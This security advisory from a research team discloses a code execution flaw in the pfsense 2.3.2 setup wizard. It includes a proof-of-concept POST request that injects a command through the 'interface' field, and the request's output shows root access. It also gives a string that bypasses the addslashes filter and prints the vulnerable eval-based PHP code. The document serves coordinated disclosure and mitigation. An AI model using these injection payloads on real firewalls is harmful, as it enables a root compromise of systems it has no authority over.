pfsense 2.3.2 Code Execution

`Security Advisory - Curesec Research Team  
  
1. Introduction  
  
Affected Product: pfsense 2.3.2  
Fixed in: 2.3.3  
Fixed Version Link: https://pfsense.org/download/  
Vendor Website: https://www.pfsense.org/  
Vulnerability Type: Code Execution  
Remote Exploitable: Yes  
Reported to vendor: 02/06/2017  
Disclosed to public: 03/24/2017  
Release mode: Coordinated Release  
CVE: requested via DWF  
Credits Tim Coen of Curesec GmbH  
  
2. Overview  
  
pfsense is an open source firewall. The web interface is written in PHP. In  
version 2.3.2-RELEASE (amd64), the setup wizard is vulnerable to code  
execution.  
  
It should be noted that by default, only an administrator can access the setup  
wizard. By default, administrators have far-reaching permissions via the wizard  
and via other functionality. There are however some custom configurations where  
this vulnerability could lead to privilege escalation or undesired code  
execution.  
  
Unknown to us, this issue was previously discussed on the github page of  
opnsense - a fork of pfsense - , although it was not classified as a  
vulnerability.  
  
3. Details  
  
CVSS: Medium; 6.8 https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/  
PR:H/UI:N/S:U/C:H/I:H/A:H  
  
When updating a config field, user input is passed to eval. For most config  
types the input is sanitized. However, the sanitation can be bypassed and there  
is no sanitation for the config type interfaces_selection. Both of these issues  
can lead to code execution.  
  
An attacker needs an account with the privilege to use the wizard ("WebCfg -  
pfSense wizard subsystem page"). The attack still works even if the privilege  
"User - Config - Deny Config Write" is set, which would normally prevent the  
user from performing changes on the server or from resetting the admin  
password.  
  
To reproduce the issue, visit https://192.168.10.150/wizard.php?xml=  
openvpn_wizard.xml, follow the instructions, and at the step that the parameter  
"interface" is used, use wan";echo exec("id");" as value.  
  
Note also that the addslashes filter for types other than interfaces_selection  
can be bypassed via ${passthru($_GET[x])}.  
  
Proof of Concept:  
  
POST /wizard.php HTTP/1.1 Host: 192.168.10.150 Content-Length: 506 __csrf_magic  
=sid%3A57913ee89f117b1d40fec5c590fe10d401717053%2C1450275812&xml=  
openvpn_wizard.xml&stepid=9&interface=wan";echo exec("id");"&protocol=TCP&  
localport=1194&description=fyjfyfyj&tlsauthentication=on&generatetlskey=on&  
dhparameters=2048&crypto=AES-256-CBC&digest=SHA1&engine=none&tunnelnet=&  
localnet=&concurrentcon=&compression=&dynip=on&addrpool=on&defaultdomain=&  
dnsserver1=&dnserver2=&dnserver3=&dnserver4=&ntpserver1=&ntpserver2=&nbttype=0&  
nbtscope=&winsserver1=&winsserver2=&advanced=&next=Next -> uid=0(root) gid=0  
(wheel) groups=0(wheel)  
  
Code:  
  
/wizard.php function update_config_field($field, $updatetext, $unset,  
$arraynum, $field_type) { [...] if($field_type == "interfaces_selection") {  
$var = "\$config{$field_conv}"; $text = "if (isset({$var})) unset({$var});";  
$text .= "\$config" . $field_conv . " = \"" . $updatetext . "\";"; eval($text);  
return; } [..] $text = "\$config" . $field_conv . " = \"" . addslashes  
($updatetext) . "\";"; eval($text); }  
  
4. Solution  
  
To mitigate this issue please upgrade at least to version 2.3.3:  
  
https://pfsense.org/download/  
  
Please note that a newer version might already be available.  
  
5. Report Timeline  
  
02/06/2017 Informed Vendor about Issue  
02/07/2017 Vendor confirms + fixes issues in git  
02/20/2017 Vendor relases fix + vendor advisory  
03/24/2017 Disclosed to public  
  
  
Blog Reference:  
https://www.curesec.com/blog/article/blog/pfsense-232-Code-Execution-199.html  
  
--  
blog: https://www.curesec.com/blog  
Atom Feed: https://www.curesec.com/blog/feed.xml  
RSS Feed: https://www.curesec.com/blog/rss.xml  
tweet: https://twitter.com/curesec  
  
Curesec GmbH  
Curesec Research Team  
Josef-Orlopp-StraAe 54  
10365 Berlin, Germany  
  
  
`